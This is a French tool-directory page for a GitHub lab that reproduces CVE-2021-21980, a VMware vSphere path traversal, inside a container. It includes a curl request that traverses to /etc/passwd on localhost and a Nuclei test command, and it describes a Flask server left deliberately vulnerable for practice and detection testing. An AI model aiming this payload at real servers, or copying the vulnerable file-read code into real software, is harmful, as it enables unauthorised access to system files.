Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
vcenter-cve-2021-21980-lab — Laboratoire vulnérable réaliste pour CVE-2021-21980 (traversée de chemin VMware vSphere) - Exploitation réelle de fichiers, pas un serveur simulé | Kitploit
Outils/GitHubGitHub/pratikjojode/vcenter-cve-2021-21980-lab
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubpratikjojode/vcenter-cve-2021-21980-lab

vcenter-cve-2021-21980-lab

Laboratoire vulnérable réaliste pour CVE-2021-21980 (traversée de chemin VMware vSphere) - Exploitation réelle de fichiers, pas un serveur simulé

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
1il y a 8 moisPas encore vérifié

CVE-2021-21980 – Environnement de test vulnérable

Aperçu

Environnement de test réaliste simulant la vulnérabilité de traversée de chemin du client Web VMware vSphere.

⚠️ AVERTISSEMENT: Environnement de test vulnérable. Ne pas exposer à Internet!

Démarrage rapide

Compilation et exécution

root@kitploit:~
podman build -t vcenter-lab .
podman run -d -p 443:443 --name vcenter-lab vcenter-lab

Tester manuellement

root@kitploit:~
curl -k "https://localhost/ui/vic-rest/services/containerView?id=../../../etc/passwd"

Tester avec Nuclei

root@kitploit:~
nuclei -t CVE-2021-21980.yaml -u https://localhost -debug

En quoi ceci diffère des serveurs simulés

✅ Lit réellement les fichiers du système de fichiers du conteneur à l'aide d'E/S de fichiers Python
✅ Comportement réaliste - Gère la traversée de chemin comme un vrai vSphere
✅ En-têtes VMware - Inclut Server: VMware-HTTP-Server/1.0
✅ SSL/TLS - Génération de certificat auto-signé
✅ Non codé en dur - Renvoie le contenu réel des fichiers

Détails de la vulnérabilité

  • CVE: CVE-2021-21980
  • Sévérité: Élevée (CVSS 7.5)
  • Type: Traversée de chemin / Lecture arbitraire de fichiers
  • Versions affectées: VMware vCenter Server 7.0, 6.7, 6.5 (non corrigé)

Fichiers

  • Dockerfile - Configuration de construction du conteneur
  • server.py - Application Flask vulnérable
  • CVE-2021-21980.yaml - Modèle de détection Nuclei
  • README.md - Ce fichier

Preuve de validation

Ce laboratoire a été validé avec Nuclei, montrant :

  • Détection réussie de la vulnérabilité
  • Lecture réelle des fichiers (pas de réponses simulées)
  • Traces HTTP complètes requête/réponse en mode débogage

Nettoyage

root@kitploit:~
podman stop vcenter-lab && podman rm vcenter-lab

Références

  • https://www.vmware.com/security/advisories/VMSA-2021-0002.html
  • https://nvd.nist.gov/vuln/detail/CVE-2021-21980
Télécharger l’outil